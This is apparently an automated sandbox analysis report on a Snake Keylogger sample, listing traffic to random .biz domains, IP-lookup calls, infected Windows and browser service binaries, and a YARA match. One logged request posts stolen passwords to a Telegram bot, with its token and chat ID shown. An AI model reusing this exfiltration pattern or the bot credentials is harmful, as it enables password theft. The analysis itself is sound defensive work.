            Source: global trafficHTTP traffic detected: POST /yjxln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /yjxln?usid=27&utid=10450772446 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
            Source: global trafficHTTP traffic detected: POST /sbjeah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /sbjeah?usid=27&utid=10450772717 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
            Source: global trafficHTTP traffic detected: POST /ebncgq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /wmfptllh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xuri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /jnemakkqdmxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bcwwcxayhua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /rgnicitetktmnuug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49706 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET /yjxln?usid=27&utid=10450772446 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
            Source: global trafficHTTP traffic detected: GET /sbjeah?usid=27&utid=10450772717 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
            Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
            Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
            Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
            Source: global trafficDNS traffic detected: DNS query: przvgke.biz
            Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
            Source: global trafficDNS traffic detected: DNS query: zlenh.biz
            Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
            Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
            Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
            Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
            Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
            Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
            Source: unknownHTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d2fbe638dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: officesvcmgr.exe.2.drString found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
            Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.000000000092E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2059203379.000000000092F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
            Source: armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dawajiqtqrkbbpd
            Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1817901404.0000000000937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
            Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/f
            Source: armsvc.exe, 00000002.00000003.1817901404.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/illjjcn
            Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/t
            Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xifbrctmnvq
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002674000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: RegSvcs.exe, 00000011.00000002.2869998704.00000000026A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: AppVClient.exe, 00000007.00000002.1596296692.0000000000554000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595419974.000000000053C000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595705403.0000000000544000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595229479.0000000000535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micrXX
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: armsvc.exe, armsvc.exe, 00000002.00000003.2117513572.0000000000969000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVk
            Source: armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0
            Source: armsvc.exe, 00000002.00000003.2369732741.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717
            Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
            Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.htmlerror
            Source: armsvc.exe, 00000002.00000003.1934226332.0000000002000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: OcPubMgr.exe.2.drString found in binary or memory: http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/namespace-prefixeshttp://xm
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
            Source: armsvc.exe, 00000002.00000003.2475920628.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: officesvcmgr.exe.2.drString found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
            Source: armsvc.exe, 00000002.00000003.1999655584.0000000002000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
            Source: armsvc.exe, 00000002.00000003.2000679168.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2000959495.0000000002000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
            Source: armsvc.exe, 00000002.00000003.2476007253.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: armsvc.exe, 00000002.00000003.2116959373.0000000002010000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2122593748.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
            Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
            Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
            Source: armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
            Source: armsvc.exe, 00000002.00000003.2475652692.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: officesvcmgr.exe.2.drString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
            Source: officesvcmgr.exe.2.drString found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
            Source: armsvc.exe, 00000002.00000003.2116959373.0000000002010000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2122593748.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
            Source: armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49711 version: TLS 1.2
            Source: officesvcmgr.exe.2.drBinary or memory string: RegisterRawInputDevicesmemstr_11577596-1

            System Summary

            barindex
            Source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: SABXJ1B5c8.exe, 00000000.00000000.1558309915.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e7ef9cb3-1
            Source: SABXJ1B5c8.exe, 00000000.00000000.1558309915.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_69d41808-f
            Source: SABXJ1B5c8.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2cd697e9-4
            Source: SABXJ1B5c8.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f5dc74ca-6
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,14_2_00858140
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\ec81b4f2d7d67082.binJump to behavior
            Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_022262F02_3_022262F0
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_022201402_3_02220140
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_022481402_3_02248140
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_022471AC2_3_022471AC
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_022258002_3_02225800
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_0223D98C2_3_0223D98C
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_02224D802_3_02224D80
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_020035D02_3_020035D0
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_020035D02_3_020035D0
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_020035D02_3_020035D0
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_020035D02_3_020035D0
            Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BD2ED07_2_00BD2ED0
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009C2ED010_2_009C2ED0
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00D02ED011_2_00D02ED0
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00BF2ED013_2_00BF2ED0
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0085814014_2_00858140
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0088F08014_2_0088F080
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_008562E014_2_008562E0
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00860A1014_2_00860A10
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0088CB1014_2_0088CB10
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0085A35014_2_0085A350
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00860B7014_2_00860B70
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0088BD8014_2_0088BD80
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00882D1014_2_00882D10
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00857E7014_2_00857E70
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00884F1014_2_00884F10
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00892F3314_2_00892F33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0242434817_2_02424348
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0242904817_2_02429048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_02421A5017_2_02421A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0242597817_2_02425978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_02422DD117_2_02422DD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0638C7B017_2_0638C7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0638434017_2_06384340
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 19_2_00D92ED019_2_00D92ED0
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: String function: 020066E8 appears 36 times
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: String function: 022331BC appears 83 times
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: String function: 025EA950 appears 195 times
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: String function: 02003960 appears 32 times
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
            Source: msedgewebview2.exe.2.drStatic PE information: Number of sections : 14 > 10
            Source: msedge_proxy.exe0.2.drStatic PE information: Number of sections : 12 > 10
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: Number of sections : 13 > 10
            Source: identity_helper.exe.2.drStatic PE information: Number of sections : 12 > 10
            Source: msedge_proxy.exe.2.drStatic PE information: Number of sections : 12 > 10
            Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
            Source: pwahelper.exe.2.drStatic PE information: Number of sections : 12 > 10
            Source: ie_to_edge_stub.exe.2.drStatic PE information: Number of sections : 11 > 10
            Source: notification_click_helper.exe.2.drStatic PE information: Number of sections : 13 > 10
            Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
            Source: setup.exe.2.drStatic PE information: Number of sections : 13 > 10
            Source: SABXJ1B5c8.exe, 00000000.00000003.1561352822.0000000003E90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs SABXJ1B5c8.exe
            Source: SABXJ1B5c8.exe, 00000000.00000003.1567001099.0000000003EA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs SABXJ1B5c8.exe
            Source: SABXJ1B5c8.exe, 00000000.00000003.1597710102.0000000004150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs SABXJ1B5c8.exe
            Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
            Source: SABXJ1B5c8.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
